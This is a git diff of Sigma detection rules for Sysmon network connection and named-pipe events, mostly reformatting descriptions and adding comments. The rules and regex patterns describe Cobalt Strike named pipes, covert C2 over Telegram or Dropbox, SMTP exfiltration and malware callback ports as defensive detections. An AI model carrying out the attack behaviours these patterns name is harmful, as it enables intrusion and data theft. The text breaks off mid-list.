b/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml @@ -23,38 +23,37 @@ detection: Image|endswith: \rundll32.exe Initiated: 'true' filter: - - DestinationIp|startswith: - - '10.' - - 192.168. - - 172.16. - - 172.17. - - 172.18. - - 172.19. - - 172.20. - - 172.21. - - 172.22. - - 172.23. - - 172.24. - - 172.25. - - 172.26. - - 172.27. - - 172.28. - - 172.29. - - 172.30. - - 172.31. - - '127.' - - '20.' - - 51.103. - - 51.104. - - 51.105. - - CommandLine|contains: PcaSvc.dll,PcaPatchSdbTask - - SourceHostname|endswith: .internal.cloudapp.net + - DestinationIp|startswith: + - '10.' + - 192.168. + - 172.16. + - 172.17. + - 172.18. + - 172.19. + - 172.20. + - 172.21. + - 172.22. + - 172.23. + - 172.24. + - 172.25. + - 172.26. + - 172.27. + - 172.28. + - 172.29. + - 172.30. + - 172.31. + - '127.' + - '20.' # Microsoft range, caused some FPs + - 51.103. # Microsoft range, caused some FPs + - 51.104. # Microsoft range, caused some FPs + - 51.105. # Microsoft range, caused some FPs + - CommandLine|contains: PcaSvc.dll,PcaPatchSdbTask + - SourceHostname|endswith: .internal.cloudapp.net filter_update_processes: ParentImage: C:\Windows\System32\svchost.exe DestinationPort: 443 condition: network_connection and (selection and not 1 of filter*) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces + - Communication to other corporate systems that use IP addresses from public address spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_script.yml b/sigma/sysmon/network_connection/net_connection_win_script.yml index e9966c94d..1cb6671c2 100644 --- a/sigma/sysmon/network_connection/net_connection_win_script.yml +++ b/sigma/sysmon/network_connection/net_connection_win_script.yml @@ -1,8 +1,7 @@ title: Script Initiated Connection id: 08249dc0-a28d-4555-8ba5-9255a198e08c status: test -description: Detects a script interpreter wscript/cscript opening a network connection. - Adversaries may use script to download malicious payloads. +description: Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113 diff --git a/sigma/sysmon/network_connection/net_connection_win_script_wan.yml b/sigma/sysmon/network_connection/net_connection_win_script_wan.yml index 1e3608dde..40073ae50 100644 --- a/sigma/sysmon/network_connection/net_connection_win_script_wan.yml +++ b/sigma/sysmon/network_connection/net_connection_win_script_wan.yml @@ -1,8 +1,7 @@ title: Script Initiated Connection to Non-Local Network id: 992a6cae-db6a-43c8-9cec-76d7195c96fc status: test -description: Detects a script interpreter wscript/cscript opening a network connection - to a non-local network. Adversaries may use script to download malicious payloads. +description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. references: - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md author: frack113, Florian Roth @@ -29,15 +28,21 @@ detection: - '10.' - '172.' - '192.' - - 169.254. - - '20.' + - 169.254. # 169.254.0.0/16 + - '20.' # Microsoft Range filter_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 +# filter_lan_cidr: +# DestinationIp|cidr: +# - '127.0.0.0/8' +# - '10.0.0.0/8' +# - '172.16.0.0/12' +# - '192.168.0.0/16' condition: network_connection and (selection and not 1 of filter*) falsepositives: - Legitimate scripts diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml b/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml index 1639cef38..ad667d99f 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml @@ -1,8 +1,7 @@ title: Suspicious Network Connection Binary No CommandLine id: 20384606-a124-4fec-acbb-8bd373728613 status: test -description: Detects suspicious network connections made by a well-known Windows binary - run with no command line parameters +description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters references: - https://redcanary.com/blog/raspberry-robin/ author: Florian Roth (Nextron Systems) @@ -23,14 +22,14 @@ detection: - \regsvr32.exe - \rundll32.exe - \dllhost.exe - CommandLine|endswith: + CommandLine|endswith: - \regsvr32.exe - \rundll32.exe - \dllhost.exe filter_no_cmdline: - CommandLine: '' - filter_null: - CommandLine: null + CommandLine: '' + filter_null: # e.g. Sysmon has no CommandLine field in network events with ID 3 + CommandLine: condition: network_connection and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml b/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml index 715178566..4ffd4d176 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml @@ -1,8 +1,7 @@ title: Suspicious Dropbox API Usage id: 25eabf56-22f0-4915-a1ed-056b8dae0a68 status: test -description: Detects an executable that isn't dropbox but communicates with the Dropbox - API +description: Detects an executable that isn't dropbox but communicates with the Dropbox API references: - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml b/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml index f3851f177..a762ff330 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml @@ -1,8 +1,7 @@ title: Suspicious Epmap Connection id: 628d7a0b-7b84-4466-8552-e6138bc03b43 status: experimental -description: Detects suspicious "epmap" connection to a remote computer via remote - procedure call (RPC) +description: Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) references: - https://github.com/RiccardoAncarani/TaskShell/ author: frack113, Tim Shelton (fps) @@ -22,12 +21,13 @@ detection: Protocol: tcp Initiated: 'true' DestinationPort: 135 + # DestinationPortName: epmap filter_image: Image|startswith: - C:\Windows\ - C:\ProgramData\Amazon\SSM\Update\amazon-ssm-agent-updater filter_image_null1: - Image: null + Image: filter_image_null2: Image: '' filter_image_unknown: diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml b/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml index 4844f47ab..cae0ba12a 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml @@ -1,12 +1,10 @@ title: Suspicious Network Connection to IP Lookup Service APIs id: edf3485d-dac4-4d50-90e4-b0e5813f7e60 related: - - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 - type: derived + - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 + type: derived status: experimental -description: Detects external IP address lookups by non-browser processes via services - such as "api.ipify.org". This could be indicative of potential post compromise - internet test activity. +description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. references: - https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a @@ -79,11 +77,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml index ec24a5442..4f5cb8af6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml @@ -1,13 +1,11 @@ title: Potentially Suspicious Malware Callback Communication id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 related: - - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c - type: similar + - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c + type: similar status: test -description: 'Detects programs that connect to known malware callback ports based - on statistical analysis from two different sandbox system databases - - ' +description: | + Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo author: Florian Roth (Nextron Systems) @@ -105,8 +103,7 @@ detection: - 172.30. - 172.31. - 192.168. - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml index d1133a7f3..c6e8dbfb8 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml @@ -1,8 +1,8 @@ title: Communication To Uncommon Destination Ports id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c related: - - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 - type: similar + - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 + type: similar status: test description: Detects programs that connect to uncommon destination ports references: @@ -52,8 +52,7 @@ detection: Image|contains: - :\Program Files\ - :\Program Files (x86)\ - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml index f1237072c..8aafc2699 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml @@ -1,11 +1,10 @@ title: Suspicious Outbound Kerberos Connection id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74 related: - - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 - type: similar + - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 + type: similar status: test -description: Detects suspicious outbound network activity via kerberos default port - indicating possible lateral movement or first stage PrivEsc via delegation. +description: Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. references: - https://github.com/GhostPack/Rubeus author: Ilyas Ochkov, oscd.community @@ -32,6 +31,10 @@ detection: - C:\Windows\System32\lsass.exe - C:\Program Files\Google\Chrome\Application\chrome.exe - C:\Program Files\Mozilla Firefox\firefox.exe + # filter_browsers: + # Image|endswith: + # - '\opera.exe' + # - '\tomcat\bin\tomcat8.exe' condition: network_connection and (selection and not 1 of filter_*) falsepositives: - Web Browsers diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml index 9d4beb2a8..86ff37481 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml @@ -1,8 +1,7 @@ title: Microsoft Sync Center Suspicious Network Connections id: 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b status: test -description: Detects suspicious connections from Microsoft Sync Center to non-private - IPs. +description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml index 07f30196d..3ffc7618b 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml @@ -1,13 +1,9 @@ title: Suspicious Outbound SMTP Connections id: 9976fa64-2804-423c-8a5b-646ade840773 status: test -description: 'Adversaries may steal data by exfiltrating it over an un-encrypted network - protocol other than that of the existing command and control channel. - - The data may also be sent to an alternate network location from the main command - and control server. - - ' +description: | + Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command and control server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp - https://www.ietf.org/rfc/rfc2821.txt diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml index dd79ce75c..cafa2302e 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml @@ -1,8 +1,7 @@ title: Suspicious Program Location with Network Connections id: 7b434893-c57d-4f41-908d-6a17bf1ae98f status: test -description: Detects programs with network connections running in suspicious files - system locations +description: Detects programs with network connections running in suspicious files system locations references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo author: Florian Roth (Nextron Systems), Tim Shelton @@ -15,8 +14,7 @@ tags: logsource: category: network_connection product: windows - definition: Use the following config to generate the necessary Event ID 3 Network - Connection events + definition: Use the following config to generate the necessary Event ID 3 Network Connection events detection: network_connection: EventID: 3 @@ -32,7 +30,7 @@ detection: - \config\systemprofile\ - \Windows\addins\ filter_optional_ibm: - Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\ + Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\ # IBM Client Solutions Default Location condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml index 53988490a..0d8e042f8 100644 --- a/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml +++ b/sigma/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml @@ -1,8 +1,7 @@ title: Suspicious Non-Browser Network Communication With Telegram API id: c3dbbc9f-ef1d-470a-a90a-d343448d5875 status: experimental -description: Detects an a non-browser process interacting with the Telegram API which - could indicate use of a covert C2 +description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -20,6 +19,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: DestinationHostname|contains: api.telegram.org + # Other browsers or apps known to use telegram should be added + # TODO: Add full paths for default install locations filter_main_brave: Image|endswith: \brave.exe filter_main_chrome: @@ -37,11 +38,11 @@ detection: filter_main_maxthon: Image|endswith: \maxthon.exe filter_main_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_main_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -61,7 +62,6 @@ detection: Image|endswith: \whale.exe condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - - Legitimate applications communicating with the Telegram API e.g. web browsers - not in the exclusion list, app with an RSS etc. + - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml b/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml index 3de1a0f85..d5d7875af 100644 --- a/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml @@ -1,18 +1,15 @@ title: Network Connection Initiated To Visual Studio Code Tunnels Domain id: 4b657234-038e-4ad5-997c-4be42340bce4 related: - - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 - type: similar - - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 - type: similar - - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b - type: similar + - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels + type: similar + - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode + type: similar + - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels + type: similar status: experimental -description: 'Detects network connections to Visual Studio Code tunnel domains initiated - by a process on a system. Attackers can abuse that feature to establish a reverse - shell or persistence on a machine. - - ' +description: | + Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html diff --git a/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml index f495176d8..d48bc58a6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml +++ b/sigma/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml @@ -1,8 +1,7 @@ title: Outbound Network Connection To Public IP Via Winlogon id: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b status: experimental -description: Detects a "winlogon.exe" process that initiate network communications - with public IP addresses +description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses references: - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ author: Christopher Peacock @securepeacock, SCYTHE @scythe_io @@ -46,7 +45,6 @@ detection: - 192.168. condition: network_connection and (selection and not 1 of filter_optional_*) falsepositives: - - Communication to other corporate systems that use IP addresses from public address - spaces + - Communication to other corporate systems that use IP addresses from public address spaces level: medium ruletype: Sigma diff --git a/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml index 5e6277d87..4063fbeea 100644 --- a/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml +++ b/sigma/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml @@ -1,13 +1,9 @@ title: Potentially Suspicious Wuauclt Network Connection id: c649a6c7-cd8c-4a78-9c04-000fc76df954 status: test -description: 'Detects the use of the Windows Update Client binary (wuauclt.exe) to - proxy execute code and making network connections. - - One could easily make the DLL spawn a new process and inject to it to proxy the - network connection and bypass this rule. - - ' +description: | + Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. + One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. references: - https://dtm.uk/wuauclt/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) @@ -20,20 +16,20 @@ tags: logsource: category: network_connection product: windows - definition: 'Requirements: The CommandLine field enrichment is required in order - for this rule to be used.' + definition: 'Requirements: The CommandLine field enrichment is required in order for this rule to be used.' detection: network_connection: EventID: 3 Channel: Microsoft-Windows-Sysmon/Operational selection: Image|contains: wuauclt - CommandLine|contains: ' /RunHandlerComServer' + CommandLine|contains: ' /RunHandlerComServer' + # "C:\WINDOWS\uus\AMD64\wuauclt.exe" /DeploymentHandlerFullPath \\?\C:\Windows\UUS\AMD64\UpdateDeploy.dll /ClassId aaa256e1-5b21-4993-9188-18f07ccb3b98 /RunHandlerComServer filter_main_ipv4: - DestinationIp|startswith: + DestinationIp|startswith: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml - '10.' - '127.' - - 169.254. + - 169.254. # link-local address - '172.16' - '172.17' - '172.18' @@ -54,12 +50,13 @@ detection: filter_main_ipv6: DestinationIp|startswith: - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd - filter_main_msrange: + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 + filter_main_msrange: # Sysmon DestinationIp|startswith: + # Subnet: 20.184.0.0/13, 51.103.210.0/23 and others - 20.184. - 20.185. - 20.186. @@ -77,17 +74,17 @@ detection: - 51.105. - 52.239. filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' filter_main_cli_null: - CommandLine: null + CommandLine: filter_main_cli_empty: - CommandLine: '' + CommandLine: '' condition: network_connection and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml b/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml index 14500952a..2803d8b2a 100644 --- a/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml +++ b/sigma/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml @@ -1,13 +1,9 @@ title: ADFS Database Named Pipe Connection By Uncommon Tool id: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 status: test -description: 'Detects suspicious local connections via a named pipe to the AD FS configuration - database (Windows Internal Database). - - Used to access information such as the AD FS configuration settings which contains - sensitive information used to sign SAML tokens. - - ' +description: | + Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). + Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. references: - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml - https://o365blog.com/post/adfs/ @@ -22,12 +18,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml index 98f8dbf84..e3e5088fc 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml @@ -1,10 +1,10 @@ title: CobaltStrike Named Pipe id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 related: - - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 - type: similar - - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a - type: similar + - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns + type: similar + - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex + type: similar status: test description: Detects the creation of a named pipe as used by CobaltStrike references: @@ -24,13 +24,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular. How to test detection? You - can always use Cobalt Strike, but also you can check powershell script from - this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -42,7 +36,7 @@ detection: - \MSSE- - -server selection_postex: - PipeName|startswith: \postex_ + PipeName|startswith: \postex_ # Also include the pipe "\postex_ssh_" selection_status: PipeName|startswith: \status_ selection_msagent: diff --git a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml index d8b5fa764..b243807e6 100644 --- a/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml +++ b/sigma/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml @@ -1,13 +1,12 @@ title: CobaltStrike Named Pipe Pattern Regex id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a related: - - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 - type: similar - - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 - type: similar + - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns + type: similar + - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic + type: similar status: test -description: Detects the creation of a named pipe matching a pattern used by CobaltStrike - Malleable C2 profiles +description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 @@ -22,14 +21,7 @@ tags: logsource: product: windows category: pipe_created - definition: Note that you have to configure logging for Named Pipe Events in Sysmon - config (Event ID 17 and Event ID 18). The basic configuration is in popular - sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but - it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, - https://github.com/olafhartong/sysmon-modular You can also use other repo, - e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. - How to test detection? You can always use Cobalt Strike, but also you can - check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + definition: Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 detection: pipe_created: EventID: @@ -37,25 +29,25 @@ detection: - 18 Channel: Microsoft-Windows-Sysmon/Operational selection: - - PipeName|re: \\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2} - - PipeName|re: \\wkssvc_?[0-9a-f]{2} - - PipeName|re: \\ntsvcs[0-9a-f]{2} - - PipeName|re: \\DserNamePipe[0-9a-f]{2} - - PipeName|re: \\SearchTextHarvester[0-9a-f]{2} - - PipeName|re: \\mypipe-(?:f|h)[0-9a-f]{2} - - PipeName|re: \\windows\.update\.manager[0-9a-f]{2,3} - - PipeName|re: \\ntsvcs_[0-9a-f]{2} - - PipeName|re: \\scerpc_?[0-9a-f]{2} - - PipeName|re: \\PGMessagePipe[0-9a-f]{2} - - PipeName|re: \\MsFteWds[0-9a-f]{2} - - PipeName|re: \\f4c3[0-9a-f]{2} - - PipeName|re: \\fullduplex_[0-9a-f]{2} - - 